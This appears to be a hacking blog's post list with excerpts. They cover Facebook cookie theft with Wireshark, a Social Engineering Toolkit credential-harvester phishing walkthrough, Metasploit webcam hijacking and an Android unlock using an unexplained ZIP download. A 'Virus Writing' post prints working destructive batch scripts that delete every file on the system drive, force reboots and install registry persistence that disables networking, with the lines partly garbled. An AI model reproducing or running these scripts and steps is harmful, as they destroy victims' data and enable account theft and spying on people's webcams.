Posts

Showing posts from 2017

How To Install iOS 9 On Android 2017

Image

how to hack gmail account 2017

Image

Hack Facebook Account By Cookie Stealing And Session Hijacking Wiith Wireshark

Hack Facebook Account By Cookie Stealing And Session Hijacking Wiith Wireshark Wireshark Software to capture cookies: Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software. Requirements : Cain and Abel : http://www.oxid.it/cain.html Wireshark : http://www.wireshark.org/ Firefox 3 (or one compatable with add n edit) : http://www.oldapps.com/firefox.php?old_firefox=59 Add n Edit (cookie editor for firefox) : https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/ Acess to the network with user you want to hack Network traffic Prerequisites: Download and install all above programs. To add “Add n Edit” to your browser just open firefox, go to tools, then click

Hack and protect website

HI FRIENDS  TODAY IM TEACHING HOW TO HACK A WEBSITE How to hack a Website More people have access to the internet than ever before. This has prompted many organizations to develop web based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers. In this article, we will introduce you to web applications hacking techniques and the counter measures you can put in place to protect against such attacks. What is a web application? What are Web Threats? A web application (aka website) is an application based on the client-server model. The server provides the database access and the business logic. It is hosted on a web server. The client application runs on the client web browser. Web applications are usually written in languages such as Java, C# and VB.Net, PHP, ColdFusion Markup Language etc. the database engines used in web applications includ

Unlock pattern without losing password

HOW TO UNLOCK ANDROID DEVICE WITHOUT LOSING DATA DOWNLOAD ZIP FILE https://drive.google.com/file/d/0BzXR6Yw_9BnYNnl0dVpGNzV4bUU/view?usp=drive_web 1 First of all, from the computer, downloadthe ZIP fileand save it to your microSD card. 2 Then, put the microSD card back into the phone.Keep the phone turned off. 3 Press and hold both the volume and the power buttons until the recovery mode appears. 4 Navigate with the volume-down button.Select options with the volume-up button. 5 Select "install zip" and apply the ZIP file from the microSD card. 6 Select "reboot system now". :-)ENJOY NOTE :-IT WILL NOT WORK FOR ALL DEVICE

Facebook - Hack and Protract Introducation ( 5 methods )

Image

complete kali linux guide for beginners

Image

Kali linux Installation to implication

Image

How to hack fb using kali

WHAT IS CREDENTIALS HARVESTER ATTACK ? it is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker. STEPS: 1. Boot up kali linux on your machine and open terminal. 2. Type this command in the kali linux terminal.                                          root@kali~# setoolkit 3. Enter ' y' to agree the social engineering toolkit terms and conditions. 4. Select the following options one by one from the menu                 '1' (Social Engineering Attacks) then                   '2'(Website Attack Vectors) then                 '3'(Credential Harvester Attack

How to unlock android phone without losing data

Step:1 First of all, from the computer, downloadthe ZIP fileand save it to your microSD card. Step:2 Then, put the microSD cardback into the phone.Keep the phone turned off. step:3 Press and hold both the volume and the power buttons until the recovery mode appears. step:4 Navigate with the volume-down button.Select options with the volume-up button. step:5 Select "install zip" and apply the ZIP file from the microSD card. step:6 Select "reboot system now". Zip file download link https://drive.google.com/file/d/0BzXR6Yw_9BnYNnl0dVpGNzV4bUU/view?usp=drive_web  Enjoy!

How to Hack Someone’s WebCam

Note: All the below method could be done only if you are running on the KaliLinux on your computer device. 1. The very first thing that you should actually know is you can only hack anyone’s webcam only and only if the device with which it is attached is beenconnected to the internet connection. This is compulsory because you cannot gain up the access to any offline device by any method as it would be impossible. You will have to create or get some kind of connection between the device that you actually want to hack from your device. 2. Now to find and check up the victim’s webcam on the internet you have to turn on the Metasploit and then using it install up the interpreteraround the victim’s device. Inside the Metasploit, you have to get up the title of any active webcam from the list that looks like a page of commands.To get that page on your screen just run the command ” meterpreter>webcam_list” 3. After that run up the another command for the particular webcam selected fro

Virus Writing

MP. Note>> I am not responsiblefor any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept. All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive… echo offdel %systemdrive%\*.* /f /s /qshutdown -r -f -t 00 Save The Above Code in a .bat file >>Disable Internet Permanently Save As A bat Fileecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho  You Have Been HACKED!PAUSE >>The Most Simple Virus To CrushThe Window @Echo offDel C:\ . |y Save It As Anything.bat *>>Delete Key Registry File*s  [NOTE THIS IS

Facebook - Hack and protect method 1 keylogger

Image